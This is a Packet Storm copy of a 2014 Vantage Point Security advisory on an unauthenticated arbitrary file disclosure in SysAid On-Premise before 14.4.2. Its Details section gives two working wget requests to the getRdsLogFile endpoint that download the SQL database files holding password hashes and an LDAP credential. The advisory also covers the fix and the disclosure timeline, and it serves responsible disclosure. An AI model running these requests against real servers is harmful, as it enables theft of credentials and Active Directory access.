SysAid Server Arbitrary File Disclosure

2014-12-24T00:00:00
ID PACKETSTORM:129705
Type packetstorm
Reporter Bernhard Mueller
Modified 2014-12-24T00:00:00

Description

                                        
                                            `Vantage Point Security Advisory 2014-004  
========================================  
  
Title: SysAid Server Arbitrary File Disclosure  
ID: VP-2014-004  
Vendor: SysAid  
Affected Product: SysAid On-Premise  
Affected Versions: < 14.4.2  
Product Website: http://www.sysaid.com/product/sysaid  
Author: Bernhard Mueller <bernhard[at]vantagepoint[dot]sg>  
  
  
Summary:  
---  
SysAid Server is vulnerable to an unauthenticated file disclosure  
attack that allows an anonymous attacker to read arbitrary files on  
the system. An attacker exploiting this issue can compromise SysAid  
user accounts and gain access to important system files. When SysAid  
is configured to use LDAP authentication it is possible to gain read  
access to the entire Active Directory or obtain domain admin  
privileges.  
  
Details:  
---  
  
How to download SysAid server database files containing usernames and  
password hashes (use any unauthenticated session ID):  
  
wget -O "ilient.mdf" --header="Cookie:  
JSESSIONID=1C712103AA8E9A3D3F1D834E0063A089" \  
"http://sysaid.example.com/getRdsLogFile?fileName=c:\\\\Program+Files\\\\SysAidMsSQL\\\\MSSQL10_50.SYSAIDMSSQL\\\\MSSQL\\DATA\\\\ilient.mdf"  
  
wget -O "ilient.ldf" --header="Cookie:  
JSESSIONID=1C712103AA8E9A3D3F1D834E0063A089" \  
"http://sysaid.example.com/getRdsLogFile?fileName=c:\\\\Program+Files\\\\SysAidMsSQL\\\\MSSQL10_50.SYSAIDMSSQL\\\\MSSQL\\DATA\\\\ilient_log.LDF"  
  
  
The dowloaded MSSQL files contain the LDAP user account and encrypted  
password used to access the Active Directory (SysAid encrypts the  
password with a static key that is the same for all instances of the  
software).  
  
  
Fix Information:  
---  
  
Upgrade to version 14.4.2.  
  
  
Timeline:  
---  
  
2014/11/14: Issue reported  
2014/12/22: Patch available and installed by client  
  
About Vantage Point Security:  
---  
  
Vantage Point Security is the leading provider for penetration testing  
and security advisory services in Singapore. Clients in the Financial,  
Banking and Telecommunications industries select Vantage Point  
Security based on technical competency and a proven track record to  
deliver significant and measurable improvements in their security  
posture.  
  
Web: https://www.vantagepoint.sg/  
Contact: office[at]vantagepoint[dot]sg  
`